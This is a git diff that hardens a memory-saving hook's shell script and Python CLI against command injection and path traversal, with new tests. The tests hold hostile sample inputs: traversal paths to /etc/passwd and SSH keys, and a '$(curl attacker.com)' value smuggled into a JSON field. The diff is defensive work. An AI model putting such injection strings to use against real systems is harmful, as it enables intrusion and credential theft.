diff --git a/hooks/mempal_save_hook.sh b/hooks/mempal_save_hook.sh index 9eda976..1afeb6e 100755 --- a/hooks/mempal_save_hook.sh +++ b/hooks/mempal_save_hook.sh @@ -65,15 +65,18 @@ MEMPAL_DIR="" INPUT=$(cat) # Parse all fields in a single Python call (3x faster than separate invocations) +# SECURITY: All values are sanitized before being interpolated into shell assignments. +# stop_hook_active is coerced to a strict True/False to prevent command injection via eval. eval $(echo "$INPUT" | python3 -c " -import sys, json +import sys, json, re data = json.load(sys.stdin) sid = data.get('session_id', 'unknown') -sha = data.get('stop_hook_active', False) +sha_raw = data.get('stop_hook_active', False) tp = data.get('transcript_path', '') # Shell-safe output — only allow alphanumeric, underscore, hyphen, slash, dot, tilde -import re safe = lambda s: re.sub(r'[^a-zA-Z0-9_/.\-~]', '', str(s)) +# Coerce stop_hook_active to strict boolean string +sha = 'True' if sha_raw is True or str(sha_raw).lower() in ('true', '1', 'yes') else 'False' print(f'SESSION_ID=\"{safe(sid)}\"') print(f'STOP_HOOK_ACTIVE=\"{sha}\"') print(f'TRANSCRIPT_PATH=\"{safe(tp)}\"') @@ -118,7 +121,11 @@ fi LAST_SAVE_FILE="$STATE_DIR/${SESSION_ID}_last_save" LAST_SAVE=0 if [ -f "$LAST_SAVE_FILE" ]; then - LAST_SAVE=$(cat "$LAST_SAVE_FILE") + LAST_SAVE_RAW=$(cat "$LAST_SAVE_FILE") + # SECURITY: Validate as plain integer before arithmetic to prevent command injection + if [[ "$LAST_SAVE_RAW" =~ ^[0-9]+$ ]]; then + LAST_SAVE="$LAST_SAVE_RAW" + fi fi SINCE_LAST=$((EXCHANGE_COUNT - LAST_SAVE)) diff --git a/mempalace/hooks_cli.py b/mempalace/hooks_cli.py index 2ce13f4..14fd9f7 100644 --- a/mempalace/hooks_cli.py +++ b/mempalace/hooks_cli.py @@ -43,9 +43,32 @@ def _sanitize_session_id(session_id: str) -> str: return sanitized or "unknown" +def _validate_transcript_path(transcript_path: str) -> Path: + """Validate and resolve a transcript path, rejecting paths outside expected roots. + + Returns a resolved Path if valid, or None if the path should be rejected. + Accepted paths must: + - Have a .jsonl or .json extension + - Not contain '..' after resolution (path traversal prevention) + """ + if not transcript_path: + return None + path = Path(transcript_path).expanduser().resolve() + if path.suffix not in (".jsonl", ".json"): + return None + # Reject if the original input contained '..' traversal components + if ".." in Path(transcript_path).parts: + return None + return path + + def _count_human_messages(transcript_path: str) -> int: """Count human messages in a JSONL transcript, skipping command-messages.""" - path = Path(transcript_path).expanduser() + path = _validate_transcript_path(transcript_path) + if path is None: + if transcript_path: + _log(f"WARNING: transcript_path rejected by validator: {transcript_path!r}") + return 0 if not path.is_file(): return 0 count = 0 diff --git a/tests/test_hooks_cli.py b/tests/test_hooks_cli.py index 5a1870e..861c054 100644 --- a/tests/test_hooks_cli.py +++ b/tests/test_hooks_cli.py @@ -15,6 +15,7 @@ from mempalace.hooks_cli import ( _maybe_auto_ingest, _parse_harness_input, _sanitize_session_id, + _validate_transcript_path, hook_stop, hook_session_start, hook_precompact, @@ -418,3 +419,87 @@ def test_run_hook_invalid_json(tmp_path): with patch("mempalace.hooks_cli._output") as mock_output: run_hook("session-start", "claude-code") mock_output.assert_called_once_with({}) + + +# --- Security: transcript_path validation --- + + +def test_validate_transcript_rejects_path_traversal(): + """Paths with '..' components should be rejected.""" + assert _validate_transcript_path("../../etc/passwd") is None + assert _validate_transcript_path("../../../.ssh/id_rsa") is None + + +def test_validate_transcript_rejects_wrong_extension(): + """Only .jsonl and .json extensions are accepted.""" + assert _validate_transcript_path("/tmp/transcript.txt") is None + assert _validate_transcript_path("/tmp/secret.py") is None + assert _validate_transcript_path("/home/user/.ssh/id_rsa") is None + + +def test_validate_transcript_accepts_valid_paths(tmp_path): + """Valid .jsonl and .json paths should be accepted.""" + jsonl_path = tmp_path / "session.jsonl" + jsonl_path.touch() + result = _validate_transcript_path(str(jsonl_path)) + assert result is not None + assert result.suffix == ".jsonl" + + json_path = tmp_path / "session.json" + json_path.touch() + result = _validate_transcript_path(str(json_path)) + assert result is not None + assert result.suffix == ".json" + + +def test_validate_transcript_empty_string(): + """Empty transcript path should return None.""" + assert _validate_transcript_path("") is None + + +def test_count_rejects_traversal_path(): + """_count_human_messages should return 0 for path traversal attempts.""" + assert _count_human_messages("../../etc/passwd") == 0 + + +def test_count_logs_warning_on_rejected_path(tmp_path): + """_count_human_messages should log a warning when a non-empty path is rejected.""" + with patch("mempalace.hooks_cli.STATE_DIR", tmp_path): + with patch("mempalace.hooks_cli._log") as mock_log: + _count_human_messages("../../etc/passwd") + mock_log.assert_called_once() + assert "rejected" in mock_log.call_args[0][0].lower() + + +def test_validate_transcript_accepts_platform_native_path(tmp_path): + """Validator accepts platform-native paths (backslashes on Windows, slashes on Unix).""" + session_file = tmp_path / "projects" / "abc123" / "session.jsonl" + session_file.parent.mkdir(parents=True) + session_file.touch() + # Use the OS-native string representation (backslashes on Windows) + result = _validate_transcript_path(str(session_file)) + assert result is not None + assert result.suffix == ".jsonl" + assert result.is_file() + + +def test_stop_hook_rejects_injected_stop_hook_active(tmp_path): + """stop_hook_active with shell injection string should not cause issues.""" + transcript = tmp_path / "t.jsonl" + _write_transcript( + transcript, + [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)], + ) + # Simulate a malicious stop_hook_active value + result = _capture_hook_output( + hook_stop, + { + "session_id": "test", + "stop_hook_active": "$(curl attacker.com)", + "transcript_path": str(transcript), + }, + state_dir=tmp_path, + ) + # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through + # It should count messages and block at the interval + assert result["decision"] == "block"